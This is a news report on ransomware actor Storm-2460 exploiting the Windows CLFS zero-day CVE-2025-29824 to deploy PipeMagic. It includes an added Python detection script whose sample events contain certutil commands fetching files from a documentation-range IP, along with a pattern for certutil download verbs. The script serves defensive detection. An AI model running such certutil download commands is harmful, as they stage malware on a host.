Tech Giant Says Threat Actors Are Exploiting a Flaw in Widely-Targeted Windows Tool

Ransomware threat actors exploited a zero-day vulnerability in a widely targeted Windows logging system known for managing transactional records, using it to launch attacks against organizations in the U.S. real estate sector, Microsoft said Tuesday.
The tech giant said in a blog post the hackers used the previously unknown flaw discovered in Windows’ Common Log File System – a frequent target for attackers seeking privilege escalation – to strike “a small number of targets,” including American real estate firms, a Spanish software firm, the financial sector in Venezuela and the retail sector in Saudi Arabia. The Cybersecurity and Infrastructure Security Agency added the vulnerability – tracked as CVE-2025-29824 – to its “Known Exploited Vulnerabilities Catalog” with a CVSS score of 7.8.
Microsoft said the flaw had been used by a ransomware threat actor known as Storm-2460, which exploited it to deploy PipeMagic malware. In March, the company patched a separate vulnerability in the Windows Win32 Kernel Subsystem that allowed attackers to escalate privileges to system level – an exploit researchers later linked to targeted attacks involving a PipeMagic backdoor against organizations in Asia and Saudi Arabia.
Microsoft said it “highly recommends” organizations apply all available security updates for elevation of privilege flaws “to add a layer of defense against ransomware attacks if threat actors are able to gain an initial foothold.”
Microsoft said it has not yet identified how Storm-2460 initially gained access to compromised devices, but added the group used the Windows certutil utility to download malware from a legitimate third-party site it had previously compromised. After deploying PipeMagic, the attackers launched the log system exploit directly in memory using a process that allowed them to avoid writing files to disk and evade detection.
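The article notes that the attackers used the built-in certutil utility to fetch malware from a compromised site. The following detection logic is an added example written for this page, not code from Microsoft or the article; it scans constructed process-creation events (Sysmon Event ID 1 style) for certutil invocations that reference a remote URL, using the documented `-urlcache` and `-verifyctl` verbs as an assumed heuristic.

```python
import re
from typing import Dict, List, Optional

# Documented certutil verbs that cause it to fetch a resource from a URL.
# Treating them as download indicators is an assumption of this example.
DOWNLOAD_VERBS = {"-urlcache", "-verifyctl"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events for illustration only (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/setup.msi C:\Users\Public\setup.msi",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",          # benign: local cert store work
     "CommandLine": r"certutil.exe -addstore Root C:\certs\corp-root.cer",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile Get-Process",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verifyctl -f -split https://203.0.113.10/x.bin",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
]

def is_certutil(image: str) -> bool:
    """True if the image's basename is certutil.exe (case-insensitive)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "certutil.exe"

def classify_event(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding when certutil is launched with a remote URL, else None."""
    if not is_certutil(event.get("Image", "")):
        return None
    cmd = event.get("CommandLine", "")
    urls = URL_RE.findall(cmd)
    if not urls:
        return None  # local-only certutil use (e.g. -addstore) is not flagged
    tokens = {t.lower() for t in cmd.split()}
    if tokens & DOWNLOAD_VERBS:
        reason = "certutil download verb with remote URL"
    else:
        reason = "certutil invoked with remote URL"
    return {"url": urls[0], "parent": event.get("ParentImage", ""), "reason": reason}

def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run the heuristic over a batch of process-creation events."""
    return [f for f in (classify_event(e) for e in events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A finding on its own is only a lead: in the chain described above, the next step worth checking is whether the fetched file was followed by in-memory activity from the same process tree.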
The company released security updates Tuesday and said that customers running Windows 11, version 24H2 “are not affected by the observed exploitation, even if the vulnerability was present.”
Microsoft did not immediately respond to a request for comment.
